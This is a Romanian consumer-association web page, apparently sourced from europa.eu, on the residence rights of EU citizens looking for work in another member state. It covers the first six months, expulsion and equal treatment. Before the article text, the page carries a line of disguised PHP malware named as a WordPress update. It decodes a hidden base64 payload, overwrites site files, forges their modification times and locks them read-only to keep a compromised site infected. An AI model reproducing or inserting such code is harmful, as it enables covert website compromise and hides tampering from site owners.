$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Drepturi de sedere pentru persoanele care isi cauta un loc de munca in strainatate – O noua atitudine

o9atitudine-Protectia-Consumatorilor-Protectia-ConsumatoruluiM-am mutat în altă țară și îmi caut un prim loc de muncă.

În calitate de cetăţean al UE, aveţi dreptul de a vă căuta un loc de muncă în altă ţară europeană.

In primele 6 luni

Dacă nu rămâneți în țara din UE în care vă căutați un loc de muncă pentru mai mult de 6 luni, nu aveți nevoie decât de o carte de identitate sau un pașaport valabil.

Persoanele care își caută un loc de muncă nu sunt nevoite să se înscrie în registrul de populație în primele 6 luni de ședere. În unele ţări din UE, trebuie totuși să vă semnalați prezenţa pe lângă autoritățile relevante (în general, poliţia sau primăria) într-un interval rezonabil de timp de la data sosirii.

În cele mai multe ţări, trebuie să aveţi permanent asupra dumneavoastrăcartea de identitate sau paşaportul.

Dacă vă uitaţi documentele de identitate acasă, aţi putea fi amendat sau reţinut temporar, dar nu puteţi fi expulzat doar din acest motiv.

Dacă primiți prestații de șomaj de la țara de origine, trebuie să vă înregistrați la oficiul de ocupare a forței de muncă din țara gazdă. În acest caz, dumneavoastră și membrii familiei dvs. beneficiaţi în continuare de sistemul de securitate socială din ţara de origine, inclusiv în ceea ce privește costul serviciilor medicale.

Cetățenii anumitor țări beneficiază în continuare de sistemul de securitate socială din ţara de origine chiar dacă nu primesc șomaj. Pentru a afla dacă este și cazul dumneavoastră, consultați autoritățile locale înainte de a pleca din țară. Atâta timp cât asigurarea dvs. de sănătate este valabilă pe durata șederii în străinătate, vă recomandăm să folosiți cardul european de asigurări sociale de sănătate (CEASS). Acesta ușurează procedurile administrative.

Caz real

În primele 6 luni în care vă căutați un loc de muncă într-o altă țară din UE, autoritățile nu ar trebui să vă ceară să vă înregistrați schimbarea de reședință.

Marta a plecat din Portugalia și stă de 4 luni la o prietenă în Spania, unde încearcă să-și găsească un loc de muncă. Poliția spaniolă i-a solicitat să-și înregistreze schimbarea de domiciliu la primărie și să dovedească faptul că are suficiente resurse pentru a se poate întreține pe durata șederii în Spania.

Întrucât se află în căutarea unui loc de muncă, Marta are însă dreptul de a sta în Spania timp de 6 luni, fără să-și declare schimbarea de domiciliu. Ea nu trebuie decât să prezinte o dovadă a faptului că face eforturi reale pentru a-și găsi o slujbă. Autoritățile spaniole nu au dreptul să-i ceară să demonstreze că are mijloacele financiare necesare pentru a trăi acolo.

Dupa 6 luni

Cererea de părăsire a teritoriului ţării / Expulzarea

În cazuri excepționale, puteți fi expulzat pe motive de politică publică, securitate publică sau sănătate publică, dar numai dacă autoritățile pot dovedi că reprezentați o amenințare serioasă.

Decizia de expulzare trebuie să vi se comunice în scris. Ea trebuie să includă toate motivele invocate şi informaţii privind căile de atac şi data până la care se poate contesta decizia în cauză.

Egalitate de tratament

Ca persoană aflată în căutarea unui loc de muncă în altă ţară din UE, trebuie să fiţi tratat la fel ca şi cetăţenii ţării respective în ceea ce priveşte:

–  accesul la piaţa muncii

–  sprijinul oferit de oficiile de ocupare a forţei de muncă pentru a vă găsi o slujbă

Totuşi, noua ţară ar putea să vă acorde anumite forme de sprijin financiar pentru a vă ajuta să găsiţi un loc de muncă (de exemplu, credite cu dobândă redusă pentru şomerii care doresc să urmeze cursuri de formare) doar după ce aţi stabilit o legătură reală cu piaţa naţională a muncii. Faptul că aţi petrecut o perioadă rezonabilă de timp în ţara respectivă, căutându-vă un loc de muncă, poate constitui o astfel de legătură.

Atenție! Persoanele aflate în căutarea unui loc de muncă în altă țară nu au dreptul la prestații de tip necontributiv pe perioada șederii în țara gazdă.

Asociaţia Naţională pentru Protecţia Consumatorilor şi Promovarea Programelor şi Strategiilor din Romania – InfoCons, unica organizaţie din România cu drepturi depline în Consumers International, este o asociaţie de consumatori neguvernamentală, reprezentativă, de drept privat, fără scop lucrativ, cu patrimoniu distinct şi indivizibil, independentă, întemeiată pe principii democratice, ce apără drepturile consumatorilor – membră fondatoare a Federaţiei Asociaţiilor de Consumatori.

Sursa : europa.eu

By o9admin